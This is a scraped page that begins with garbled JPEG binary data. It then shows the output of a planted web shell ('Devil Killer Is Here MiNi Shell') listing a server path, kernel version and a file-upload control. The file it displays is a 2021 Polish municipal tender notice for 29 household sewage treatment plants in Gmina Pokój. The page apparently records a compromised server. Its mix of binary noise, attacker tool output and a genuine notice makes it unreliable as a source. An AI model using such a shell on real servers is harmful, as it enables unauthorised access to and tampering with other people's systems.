JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210510/0005018201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00050182 z dnia 2021-05-10</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utworzenie przydomowych oczyszczalni ścieków na terenie gminy Pokój w systemie zaprojektujwybuduj w ramach realizacji operacji z PROW na lata 2014-2020. EFR na rzecz RozwojuObszarów Wiejskich </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pokój</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531412740</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sienkiewicza</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pokój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-034</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774693080</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">774693080 w.22</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@gminapokoj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.gminapokoj.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utworzenie przydomowych oczyszczalni ścieków na terenie gminy Pokój w systemie zaprojektujwybuduj w ramach realizacji operacji z PROW na lata 2014-2020. EFR na rzecz RozwojuObszarów Wiejskich </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1678eaca-b182-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00050182</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000978/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Wyposażenie gospodarstw domowych w przydomowe oczyszczalnie ścieków szt. 29- Zaprojektuj Wybuduj </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Programu Rozwoju Obszarów Wiejskich na lata 2014-2020. Europejski Fundusz Rolny na rzeczRozwoju Obszarów Wiejskich: Europa Inwestująca w Obszary Wiejskie. Umowa odofinansowanie nr 00059-65150-UM0800068/19 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.plhttps://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami wszczególności składanie ofert, wniosków (innych niż oferta), zawiadomień oraz przekazywanieinformacji odbywa się elektronicznie za pośrednictwem dedykowanego Formularza do komunikacjidostępnego na ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanejz niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numeremogłoszenia(BZP,TEDlub Id Postępowania). Zamawiający może również komunikować się zWykonawcami za pomocą poczty elektronicznej zamowieniapobliczne@gminapokoj.pl luba.hadamik@gminapokoj.pl</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">nie dotyczy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119z04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: 1. Jest administratorem danychosobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;2.dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celuzwiązanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn.:”Utworzenieprzydomowych oczyszczalni ścieków na terenie gminy Pokój w systemie zaprojektuj wybuduj wramach realizacji operacji z Programu Rozwoju Obszarów Wiejskich na lata 2014-2020. EuropejskiFundusz Rolny na rzecz Rozwoju Obszarów Wiejskich: Europa Inwestująca w Obszary Wiejskie”3.odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostaniedokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. –Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.), dalej „ustawa Pzp”; 4. daneosobowe Wykonawcy będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat oddnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza4lata, okres przechowywania obejmuje cały czas trwania umowy; 5. obowiązek podania przezWykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonymw przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówieniapublicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 6. w odniesieniudo danych osobowych Wykonawcy decyzje nie będą podejmowane w sposóbzautomatyzowany,stosowanie do art. 22 RODO; c.d. SWZ Rozdział I podrozdział 20</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zapisy Rozdział I podrozdział 20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SG.III.271.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot niniejszego zamówienia stanowi wykonanie zadania pn.: „Utworzenie przydomowychoczyszczalni ścieków na terenie gminy Pokój”, w systemie zaprojektuj-wybuduj, przy udzialeśrodków europejskich na operację typu "Gospodarka wodno-ściekowa" w ramachpoddziałania"Wsparcie inwestycji związanych z tworzeniem, ulepszaniem lub rozbudowąwszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i woszczędzanie energii"objętego Programem Rozwoju Obszarów Wiejskich na lata 2014-2020.Umowa o przyznaniu pomocy Nr 00059-65150-UM0800068/19. Przedmiotem zamówienia jestzarówno wykonanie badań gruntu, dokumentacji projektowej wraz ze wszystkimi uzgodnieniami i pozwoleniami oraz wykonanie robót budowlanych polegających dostawie, montażu iuruchomieniu 29 szt.przydomowych oczyszczalni ścieków z systemem rozsączania ściekówoczyszczonych w postaci drenażu, poletka lub tuneli filtracyjnych. Przedmiot zamówieniaobejmuje 2 etapy realizacji zadania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <p class="mb-0">45232423-3 - Roboty budowlane w zakresie przepompowni ścieków</p> <p class="mb-0">45252127-4 - Roboty budowlane w zakresie oczyszczalni ścieków</p> <p class="mb-0">45255600-5 - Roboty w zakresie kładzenia rur w kanalizacji</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">245 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert: Cena i Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia.Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów (PO) obliczoną na podstawie wzoru:PO = PC + PG gdzie: PO - łączna ilość punktów oferty ocenianej, PC - liczba punktów uzyskanych w kryterium „Cena”,PG - liczba punktów uzyskanych w kryterium „Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na roboty budowlane oraz zamontowane materiałyi urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek dotyczący zdolności technicznej lub zawodowej w zakresie: Opis sposobudokonywania oceny spełniania tego warunku: a. Wykonawca wykaże, że wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończył nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:co najmniej 8 robót budowlanych, z których każda polegała na budowie przydomowej oczyszczalni ścieków. Jeżeli Wykonawca wykaże, że w ramach jednej roboty budowlanej, wykonał co najmniej 8 szt. przydomowych oczyszczalni ścieków spełnipowyższy warunek. Robota budowlana jest tu podana jako jedna przydomowa oczyszczalniaścieków. Aby spełnić powyższy warunek należy wykazać co najmniej 8 utworzonychprzydomowych oczyszczalni ścieków. b. Wykonawca wykaże, że dysponuje lub będziedysponował osobami zdolnymi do realizacji zamówienia posiadający niezbędnekwalifikacje:Projektantem w specjalności instalacyjnej w zakresie sieci instalacji i urządzeńcieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych w ograniczonym zakresie(sieci,instalacje i urządzenia wodociągowe i kanalizacyjne) lub posiadający uprawnieniabudowlane bez ograniczeń - (1 osoba), która posiada: doświadczenie zawodowe wprojektowaniu przy samodzielnym wykonaniu minimum dwóch (2) projektów branży instalacjisanitarnych,dotyczących budowy przydomowych oczyszczalni ścieków <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu: Zamawiający niewymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie. Wymaganejest natomiast Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenia stanowiące wstępnepotwierdzenie, że Wykonawca na dzień składania ofert: nie podlega wykluczeniu, - Załącznik nr 4</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu opróczwstępnego oświadczenia o spełnieniu warunków załącznik nr 5 do SWZ Wykonawca składa: a. wykazurobót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzeniadziałalności jest krótszy –w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania orazpodmiotów, na rzecz których roboty te zostały wykonane (sporządzonego zgodnie z Załącznikiem Nr7do SWZ), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonanenależycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczynniezależnych od niego nie jest wstanie uzyskać tych dokumentów –inne odpowiednie dokumenty – wodniesieniu do warunku określonego w pkt 6.2 ppkt 4 lit. a SWZ, b. wykazu osoby,posiadającyuprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci instalacjiurządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych w ograniczonym zakresie(sieci,instalacje i urządzenia wodociągowe i kanalizacyjne) lub posiadający uprawnienia budowlane bezograniczeń, który posiada: doświadczenie zawodowe w projektowaniu przy samodzielnym wykonaniuminimum dwóch (2) projektów branży instalacji sanitarnych, dotyczących budowy przydomowychoczyszczalni ścieków sporządzone zgodnie z Załącznikiem Nr 8 do SWZ – w odniesieniu do warunkuokreślonego w pkt. 6.2 ppkt 4 lit. b SW</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający celem potwierdzenia, że oferowane przez Wykonawcę materiały i urządzeniaodpowiadają wymaganiom stawianym przez Zamawiającego żąda przedłożenia wraz z ofertąprzedmiotowych środków dowodowych potwierdzających spełnienie wymagań określonychprzez Zamawiającego. Zamawiający żąda dostarczenia środków dowodowych wraz z ofertą wpostaci: 1)pełnych raportów z badań wystawionych przez laboratorium notyfikowane przezKomisję Europejską , według procedur określonych w normie PN EN 12566-3:+A2:2013,2)Deklaracji Właściwości Użytkowych,3)Dokumentacji Techniczno-Ruchowej,instrukcji montażu i eksploatacji,4)dokumentów, wynikających z przepisów normy PNEN12566-3:2005+A2:2013 zakresie reakcji na ogień oraz wydzielania substancji niebezpiecznych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1)pełnych raportów z badań wystawionych przez laboratorium notyfikowane przez KomisjęEuropejską , według procedur określonych w normie PN EN 12566-3:+A2:2013,2)DeklaracjiWłaściwości Użytkowych,3)Dokumentacji Techniczno-Ruchowej,instrukcji montażu ieksploatacji,4)dokumentów, wynikających z przepisów normy PN-EN 12566-3:2005+A2:2013zakresie reakcji na ogień oraz wydzielania substancji niebezpiecznych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniuna podstawie art. 125 ust. 1 i w związku z art. 266 ustawy Pzp. 2. Oświadczenie Wykonawcówwspólnie ubiegających się o udzielenie zamówienia. 3.Oświadczenie Wykonawcy dotycząceRODO. 4.Dowód wniesienia wadium w kwocie i formie wskazanej w rozdziale 10 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 10.1	Wykonawca jest zobowiązany wnieść wadium w wysokości: 5 000,00 PLN (słownie zł: pięć tysięcy złotych 00/100),10.2	Wadium może być wniesione w jednej lub kilku następujących formach:a)pieniądzu;b)gwarancjach bankowych;c)gwarancjach ubezpieczeniowych;d)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.10.3	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego: Bank Spółdzielczy w Namysłowie O/Pokój nr konta: 23 8890 1066 0000 0299 2004 0008z adnotacją „Wadium – Znak sprawy: SG.III.271.6.2021-Utworzenie przydomowych oczyszczalni ścieków na terenie gminy Pokój10.4 Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.10.5 Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej-przed upływem terminu składania ofert.10.6 W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy: a. nazwę: dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib, b. kwotę wadium, c. termin ważności gwarancji/poręczenia w formule: „od dnia …….– do dnia ………”, d. zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej w gwarancji/poręczeniu na pierwsze żądanie Zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy.10.7	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków,	o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.10.8	Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takimprzypadku,Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu oudzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawiezamówienia publicznego.9.2 W przypadku Wykonawców wspólnie ubiegających się o udzieleniezamówienia:a. oświadczenia o których mowa w pkt. 7.1 SWZ składa z ofertą każdy zWykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brakpodstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji wzakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w 